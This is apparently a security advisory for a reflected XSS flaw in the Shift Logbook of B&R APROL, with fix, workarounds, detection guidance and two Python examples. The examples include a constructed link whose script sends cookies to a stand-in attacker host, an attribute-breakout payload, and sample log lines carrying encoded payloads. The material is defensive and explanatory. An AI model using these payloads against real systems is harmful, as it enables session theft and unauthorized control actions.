CVE-2024-5624
📋 TL;DR
This reflected cross-site scripting (XSS) vulnerability in the Shift Logbook application of B&R APROL lets an attacker craft a link that, when opened by a logged-in user, runs attacker-controlled JavaScript in that user's browser within the Shift Logbook origin. From there the script can read what the browser can reach (such as session cookies not marked HttpOnly), redirect the user, or issue requests on the user's behalf with the user's privileges. Organizations running B&R APROL with the Shift Logbook feature are affected.
💻 Affected Systems
- B&R APROL
📦 What is this software?
B&R APROL is the process control system (DCS) from B&R Industrial Automation; the Shift Logbook is one of its web-based applications, used for shift handover entries, and it is the component in which the reflected XSS occurs.
⚠️ Risk & Real-World Impact
Worst Case
An attacker tricks an APROL administrator into opening a crafted link, captures the administrator's session (if the cookie is readable from script) or drives authenticated requests from the administrator's browser, and uses that access to change engineering or process configuration, with production disruption or physical consequences as the downstream risk. This is an escalation chain rather than a direct effect of the XSS: each step depends on the privileges of the user who was phished and on what the web session can reach.
Likely Case
An attacker phishes an operator or engineer with a crafted Shift Logbook link and uses the resulting browser-side access to read data visible to that user or to submit changes the user is authorized to make.
If Mitigated
Contextual output encoding of the reflected parameter (HTML-entity encoding in a text context, with attribute values quoted) turns the payload into inert text before it reaches the browser; server-side input validation is a second layer, not a substitute. HttpOnly session cookies and a Content Security Policy further limit what a successful injection could do.
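The difference between the vulnerable and the fixed behaviour, as an added example in Python that is not code from the advisory or from B&R: the hostname, the `/shiftlogbook/search` path and the `q` parameter are assumptions, and the attack URL is constructed for the example. It shows a raw reflection, the same template with HTML-entity encoding, and the case where encoding alone is not enough because the value lands in an unquoted attribute. A small HTML-parser scanner reports what a browser would actually execute in each rendered page.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link (hostname, path and the "q" parameter are assumptions,
# not details from the advisory). The payload is what the victim's browser sends.
ATTACK_URL = (
    "https://aprol.example/shiftlogbook/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the decoded value of one query parameter, as the server sees it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the raw search term into the HTML body: a reflected-XSS sink."""
    return f"<p>No logbook entries matched <b>{term}</b></p>"


def render_hardened(term: str) -> str:
    """Same template with contextual output encoding for an HTML text node."""
    return f"<p>No logbook entries matched <b>{html.escape(term, quote=True)}</b></p>"


def render_attr_unquoted(term: str) -> str:
    """Encoding alone is not enough here: an unquoted attribute ends at the first space."""
    return f"<input name=q value={html.escape(term, quote=True)}>"


def render_attr_quoted(term: str) -> str:
    """Quoting the attribute plus encoding (which covers the quote characters) closes the breakout."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


class ActiveContentScanner(HTMLParser):
    """Collects anything in the rendered page that a browser would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}")


def active_content(page: str) -> list[str]:
    """Return the list of executable constructs found in a rendered page."""
    scanner = ActiveContentScanner()
    scanner.feed(page)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    term = query_param(ATTACK_URL, "q")
    print("vulnerable   :", active_content(render_vulnerable(term)))
    print("hardened     :", active_content(render_hardened(term)))
    breakout = "x onfocus=alert(1) autofocus"  # constructed attribute-breakout payload
    print("unquoted attr:", active_content(render_attr_unquoted(breakout)))
    print("quoted attr  :", active_content(render_attr_quoted(breakout)))
```

The scanner is only a check for the example, not a production XSS detector; the point it makes is that `html.escape` is the right fix for a text node, but the encoding has to match the context the value is placed in, which is why an unquoted attribute still yields an event handler.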
🎯 Exploit Status
Reflected XSS requires a victim to open an attacker-supplied link (delivered by phishing, chat, or a lure page), so social engineering is part of any real attack; once the vulnerable parameter is known, building the link itself is straightforward.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after R 4.4-00P3
Vendor Advisory: https://www.br-automation.com/fileadmin/SA24P2014_Multiple_vulnerabilities_in_BR_APROL.pdf-367290ae.pdf
Restart Required: Yes
Instructions:
1. Download and install the latest APROL release from B&R Automation (a version after R 4.4-00P3).
2. Apply all available security patches.
3. Restart the APROL system.
4. Verify that the Shift Logbook application reports the updated version.
🔧 Temporary Workarounds
Web Application Firewall (WAF)
Deploy a WAF with XSS rules in front of the APROL web interface to filter script-like input before it reaches the application. Treat this as a stopgap: signature rules are bypassable with encoding and alternative payloads, so it reduces opportunistic attacks rather than closing the vulnerability.
Input Validation Filter
Server-side validation and output encoding of the reflected parameter is the real fix, and it lives in vendor code. Operators can only approximate it by rejecting requests whose Shift Logbook parameters carry angle brackets, javascript: URLs or event-handler attributes at a reverse proxy or WAF they control.
🧯 If You Can't Patch
- Serve a strict Content Security Policy (CSP) from a reverse proxy in front of APROL to block inline script; roll it out in Content-Security-Policy-Report-Only mode first, since a vendor web application that relies on inline scripts will break under an enforced policy
- Restrict network access to APROL systems using firewalls and network segmentation, and keep the browsers used for APROL off untrusted web and e-mail, since a reflected XSS needs a user to open the attacker's link
🔍 How to Verify
Check if Vulnerable:
In a test or staging system, not on a live plant network, submit a harmless probe such as <script>alert('test')</script> to Shift Logbook input parameters and inspect the HTML response: the application is vulnerable if the probe is reflected unencoded, whether or not the browser shows the alert. A filter that blocks only one literal string can be bypassed, so the absence of an alert alone proves nothing.
Check Version:
Read the installed APROL release from the administration interface or the version query described in the system documentation; releases up to and including R 4.4-00P3 are affected, later releases carry the fix.
Verify Fix Applied:
After patching, repeat the probe and confirm the reflected value is HTML-encoded in the response (for example &lt;script&gt;) rather than merely absent, and that percent-encoded variants such as %3Cscript%3E are handled the same way.
📡 Detection & Monitoring
Log Indicators:
- HTTP requests to Shift Logbook endpoints whose parameters contain script tags, event-handler attributes or javascript: URLs, including percent-encoded and double-encoded forms
- Shift Logbook requests whose Referer is an external origin (the victim arrived from a lure page or a phishing e-mail), especially when the response status is 200
Network Indicators:
- HTTP requests with encoded script payloads in query parameters
- Shift Logbook responses followed immediately by connections from the same client to unfamiliar external hosts, consistent with cookie exfiltration or a forced redirect
SIEM Query (pseudo-syntax; the source name and field names are placeholders to adapt to your log schema, and percent-encoded variants are included because browsers send the payload encoded in the URL, so a query that matches only the literal "<script>" misses most real requests):
source="aprol_logs" AND uri="*shiftlogbook*" AND (query="*<script*" OR query="*%3Cscript*" OR query="*javascript:*" OR query="*javascript%3A*" OR query="*onerror=*" OR query="*onerror%3D*" OR query="*onload=*" OR query="*onload%3D*")
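The detection logic from the log and SIEM indicators above, run over sample access-log lines, as an added example in Python that is not part of the advisory or of any B&R tooling. The log lines, hostnames, user names, timestamps and the `/shiftlogbook/search?q=` endpoint are constructed for the example. It decodes each request URI repeatedly before matching, so percent-encoded and double-encoded payloads are caught, flags requests that arrive with an external Referer, and compares the result with what a literal-string match would have found.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample in combined format. Hostnames, user names,
# timestamps and the "/shiftlogbook/search?q=" endpoint are assumptions for the
# example, not details taken from the advisory.
SAMPLE_LOG = """\
10.0.5.21 - operator [12/Jun/2024:08:14:02 +0200] "GET /shiftlogbook/search?q=pump+3 HTTP/1.1" 200 5120 "https://aprol.example/shiftlogbook/" "Mozilla/5.0"
10.0.5.21 - operator [12/Jun/2024:08:15:40 +0200] "GET /shiftlogbook/search?q=<script>alert(1)</script> HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
10.0.5.33 - - [12/Jun/2024:08:16:11 +0200] "GET /shiftlogbook/search?q=%3Csvg%20onload%3Dalert(1)%3E HTTP/1.1" 200 5198 "https://evil.example/lure.html" "Mozilla/5.0"
10.0.5.33 - - [12/Jun/2024:08:16:45 +0200] "GET /shiftlogbook/search?q=%253Cscript%2520src%253D%252F%252Fevil.example%252Fx.js%253E%253C%252Fscript%253E HTTP/1.1" 200 5230 "https://evil.example/lure.html" "Mozilla/5.0"
10.0.5.40 - - [12/Jun/2024:08:17:02 +0200] "GET /other/app?q=%3Cscript%3E HTTP/1.1" 404 312 "-" "curl/8.4"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Signatures are applied to the *decoded* URI so that encoded and
# double-encoded payloads match as well as literal ones. The event-handler
# list is deliberately short; extend it for your environment.
XSS_SIGNATURES = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "javascript: URL": re.compile(r"javascript\s*:", re.I),
    "event handler": re.compile(r"\bon(?:load|error|focus|click|mouseover|input|toggle)\s*=", re.I),
    "html injection": re.compile(r"<\s*(?:svg|img|iframe|object|embed|body)\b", re.I),
}


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the value is stable, unwrapping double encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(lines, path_filter="/shiftlogbook/", own_origin="https://aprol.example"):
    """Return one finding per Shift Logbook request whose decoded URI matches an XSS signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or path_filter not in m.group("uri").lower():
            continue
        decoded = decode_fully(m.group("uri"))
        hits = [name for name, sig in XSS_SIGNATURES.items() if sig.search(decoded)]
        if not hits:
            continue
        referer = m.group("referer") or "-"
        findings.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "uri": m.group("uri"),
            "decoded": decoded,
            "hits": hits,
            # A victim lured by a phishing page arrives with a foreign Referer.
            "external_referer": referer != "-" and not referer.startswith(own_origin),
        })
    return findings


def naive_literal_match(lines) -> int:
    """Count what a literal match on '<script>', 'javascript:' and 'onerror=' finds in raw log lines."""
    return sum(
        1 for line in lines
        if "shiftlogbook" in line.lower()
        and any(s in line for s in ("<script>", "javascript:", "onerror="))
    )


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for f in scan_access_log(lines):
        print(f["ip"], f["status"], f["hits"], "external referer" if f["external_referer"] else "", f["decoded"])
    print("literal-only matches:", naive_literal_match(lines))
```

On the sample, the literal match finds only the one request that carried the payload unencoded, while the decoding scan also flags the percent-encoded `<svg onload=...>` and the double-encoded `<script src=...>` requests, both of which arrive with a Referer from an external origin. Treat a 200 response to such a request as the case to escalate: it means the application accepted the input and returned a page in which a vulnerable build would have reflected it.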